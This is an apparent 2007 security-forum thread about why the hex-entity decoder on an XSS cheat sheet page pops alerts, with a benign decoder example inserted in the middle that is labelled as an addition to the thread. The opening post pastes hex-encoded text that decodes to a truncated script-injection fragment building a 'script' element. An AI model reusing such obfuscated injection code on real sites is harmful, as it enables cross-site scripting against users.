Sla.ckers.org
http://ha.ckers.org/xss.html
Posted by: darknessends
Date: December 22, 2007 01:43AM

Go To
http://ha.ckers.org/xss.html

In the textbox before " Decode Hex Entities To Ascii " paste the following

&#x64&#x65&#x3B&#x73&#x63&#x72&#x3D&#x64&#x6F&#x63&#x75&#x6D&#x65&#x6E&#x74&#x2E&#x63&#x72&#x65&#x61&#x74&#x65&#x45&#x6C&#x65&#x6D&#x65&#x6E&#x74&#x28&#x78&#x28&#x31&#x31&#x35&#x2C&#x39&#x39&#x2C&#x31&#x31&#x34&#x2C&#x31&#x30&#x35&#x2C&#x31&#x31&#x32&#x2C&#x31&#x31&#x36&#x29&#x29&#x3B&#x73&#x63&#x72&#x2E&#x73&#x65&#x74&#x41&#x74&#x74

Click the " Decode Hex Entities To Ascii " Button.....

Now tell me what is happening?

Re: http://ha.ckers.org/xss.html
Posted by: darknessends
Date: December 24, 2007 10:40AM

3 days - 55 Views And No Replies ? Am I asking something kiddish, pardon me please and let me understand what actually is going on ?

Re: http://ha.ckers.org/xss.html
Posted by: thornmaker
Date: December 24, 2007 11:40AM

The question is not kiddish, but there's nothing magical going on either. When you click the "decode hex entities to ascii" button, the JavaScript function convertHexToASCII() gets called. That function is located in the file xssscript.js. The function checks the length of each hex entity... since the semicolon is missing from each entity, the first part of the if statement gets used rather than the second, and that first part has an alert in it... so it alerts once per malformed hex entity. So why is there an alert there? I would guess it is just a debugging statement that rsnake forgot to take out and no one has really noticed because most people probably enter in properly formatted hex entities. Does that make sense?

Here's the convertHexToASCII() function for reference:
function convertHexToASCII() {
  if (document.XSS.hexhtml.value != '') {
    var hexText = document.XSS.hexhtml.value;
    // Drop the leading "&#x", then split on the remaining "&#x" prefixes
    var testText = hexText.substring(3,hexText.length).split("&#x");
    var resultString = '';
    var sub = '';
    for (i=0;i<testText.length;i++) {
      // Assumes each piece ends in ";" and takes the two characters before it
      sub = testText[i].substring(testText[i].length-3,testText[i].length-1)
      if (sub.length < 2) {
        // Reached when the ";" is missing: sub is a single character
        resultString += "%0" + sub;
        alert (sub, " - ", resultString);
      } else {
        resultString += "%" + sub;
      }
      document.XSS.ascii.value = unescape(resultString);
    }
  }
}

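A decoder that accepts hex entities with or without the trailing semicolon, the case that sends the function above into its first branch. This is an added example, not part of the original thread or of xssscript.js; the name decodeHexEntities, the malformed counter and the sample inputs are assumptions constructed here.

```javascript
// Added example: decode hex character references whether or not the
// trailing semicolon is present. All names here are hypothetical.

// "&#x" + 1..6 hex digits + optional ";" (the "x" may be upper or lower case).
const HEX_ENTITY = /&#x([0-9a-f]{1,6});?/gi;

function decodeHexEntities(input) {
  let malformed = 0; // entities that lacked the terminating ";"
  const text = input.replace(HEX_ENTITY, (match, hex) => {
    if (!match.endsWith(";")) malformed++;
    const codePoint = parseInt(hex, 16);
    // Out-of-range or surrogate code points: leave the entity untouched.
    if (codePoint > 0x10ffff || (codePoint >= 0xd800 && codePoint <= 0xdfff)) {
      return match;
    }
    return String.fromCodePoint(codePoint);
  });
  return { text, malformed };
}

// Constructed sample inputs (not taken from the thread).
const wellFormed = "&#x68;&#x65;&#x78;"; // decodes to "hex"
const noSemicolon = "&#x68&#x65&#x78";   // same text, every ";" missing
const mixed = "a&#x3D;b &#X26 c";        // one proper entity, one without ";"

console.log(decodeHexEntities(wellFormed));
console.log(decodeHexEntities(noSemicolon));
console.log(decodeHexEntities(mixed));
```

The malformed count gives a reviewer the same signal the stray alert did, without interrupting the decode.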
Re: http://ha.ckers.org/xss.html
Posted by: darknessends
Date: December 25, 2007 11:02AM

Perfect..........

Re: http://ha.ckers.org/xss.html
Posted by: rsnake
Date: December 30, 2007 02:34PM

Holidays were murder on my ability to be online. Yes, that's exactly what was going on.

- RSnake
Gotta love it. http://ha.ckers.org
